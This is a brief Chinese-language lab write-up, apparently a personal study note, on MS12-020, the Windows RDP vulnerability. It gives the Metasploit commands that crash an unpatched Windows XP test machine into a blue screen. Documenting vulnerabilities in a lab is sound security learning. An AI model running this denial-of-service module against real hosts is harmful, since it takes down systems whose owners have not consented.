关于MS12-020一次简单尝试

正好这几天不忙，就想着慢慢学习，再写点简单的东西，进行总结记录。

这次尝试的是MS12-020，可导致BSOD（死亡蓝屏）

MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞，

远程桌面协议（RDP, Remote Desktop Protocol）是一个多通道（multi-channel）的协议，让用户（客户端或称“本地电脑”）连上提供微软终端机服务的电脑（服务器端或称“远程电脑”）。Windows在处理某些对象时存在错误，可通过特制的RDP报文访问未初始化的或已经删除的对象，导致任意代码执行，然后控制系统。

CVE ID: CVE-2012-0002

影响范围：开了RDP的Microsoft Windows XP Professional /Microsoft Windows XP Home/ Microsoft Windows Server 2003 Standard Edition /Microsoft Windows Server 2003 Enterprise Edition /Microsoft Windows Server 2003 Datacenter Edition /Microsoft Windows 7（绿盟说是影响全版本windows系统，当时win8和win10还未出）

补丁地址：https://technet.microsoft.com/library/security/ms12-020

首先确定kali为攻击机，windows xp professional  service park 2为靶机。当然，开启了远程桌面，也没打补丁。

接下来，打开msfconsole,输入命令search ms12-020

可选择的模块有2个，我们先选择第一个进行。尝试。

输入命令：use  auxiliary/dos/windows/rdp/ms12_020_maxchannelids  然后回车

进入这个模块后，查看当下的配置。

show options 

然后设置靶机IP。

set RHOST 192.168.19.130

最后，输入run,回车运行。

当提示seems down时，查看靶机情况。

 如图所示，RPDWD.SYS引起的蓝屏。